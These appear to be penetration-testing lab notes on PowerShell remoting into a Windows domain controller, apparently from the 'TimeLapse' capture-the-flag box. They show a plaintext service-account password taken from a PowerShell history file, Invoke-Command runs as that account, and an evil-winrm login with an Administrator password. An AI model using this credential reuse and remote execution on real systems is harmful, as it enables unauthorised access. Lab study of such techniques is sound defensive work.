# PS-Remoting There is two ways in which we can PSRemote into a system, usually after invoking SharpHound we would be able to see that some users have this right. ![](https://3418038199-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyTPWZkKJbJfX8uHiRzmn%2Fuploads%2FWjoIrRmwHqvoUmxTJ1aE%2F2022-07-27_23-43.png?alt=media\&token=b61aef81-03f6-45e2-93ad-ba80f426fb6f) In the picture above, we can see that both current owned users are able to PS-Remote into the Domain Controller. This means that with a valid password we can use the following chain of commands to execute code. So in the case of TimeLapse we had a Powershell text history that allowed us to get the password who was able to PS-Remote into the system. In the text file we found the following text: ``` *Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt whoami ipconfig /all netstat -ano |select-string LIST $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl - SessionOption $so -scriptblock {whoami} get-aduser -filter * -properties * exit ``` So in theory if we pass the same commands we would be able to execute the commands as the user svc\_deploy. Chain of commands. ``` *Evil-WinRM* PS C:\Users> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck *Evil-WinRM* PS C:\Users> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force *Evil-WinRM* PS C:\Users> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) ``` Now executing commands via PS-Remoting. ``` *Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami} timelapse\svc_deploy *Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {hostname} dc01 ``` ### Evil-WInRM We can use -S to specify PS-Remoting. ``` evil-winrm -u 'Administrator' -p '8p4Uc,AC5lJ9E]P9X7#3$10@' -i 10.10.11.152 -S ``` ### PoweView ``` Enter-PSSession -ComputerName -Credential user\domain ```